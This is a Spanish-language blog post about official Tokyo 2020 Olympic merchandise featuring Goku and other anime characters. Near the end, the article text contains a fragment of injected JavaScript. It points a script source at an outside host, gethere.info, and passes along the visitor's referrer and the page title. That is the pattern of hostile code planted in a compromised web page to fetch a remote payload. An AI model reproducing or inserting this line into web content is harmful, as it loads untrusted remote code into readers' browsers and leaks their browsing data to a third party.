Gokú será embajador de los Juegos Olímpicos de Tokyo 2020

Hace ya un ratote que fueron los Juegos Olímpicos de Rio, y nos sorprendió a todos ver la participación de algunos personajes de videojuegos y anime en un video muy especial con la participación de Mario y Pac-Man nos quedó claro algo: esta ceremonia sería una de las mejores para los geeks/gamers.

 

Ahora tenemos una razón más para saltar de gusto, pues la tienda oficial de souvenirs de los Juegos Olímpicos de Tokio 2020, tiene productos bastante peculiares.

 Por ejemplo, venden playeras conmemorativas con personajes de Dragon Ball, Sailor Moon, Yokai Watch y Naruto, además de clásicos como Crayon Shin-Chan.

 goku_es_el_embajador_de_los_juegos_olimpicos_de_japon_1

En estos productos se puede leer el clásico cántico para animar a los atletas en esta competición. “Ganbare Nippon”, que significa “Go for it, Japan.” (ve por ello, Japón).

Lo que nos intriga bastante es que los personajes de Nintendo no aparecen en estos productos, considerando que el primer ministro salió disfrazado como el plomero de Nintendo.

ministro

Si te interesa conseguir alguno de estos productos, da click aquí.

Considerando que son productos oficiales, las posibilidades de ver a estos grandiosos personajes de la animación japonesa son bastante altas.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)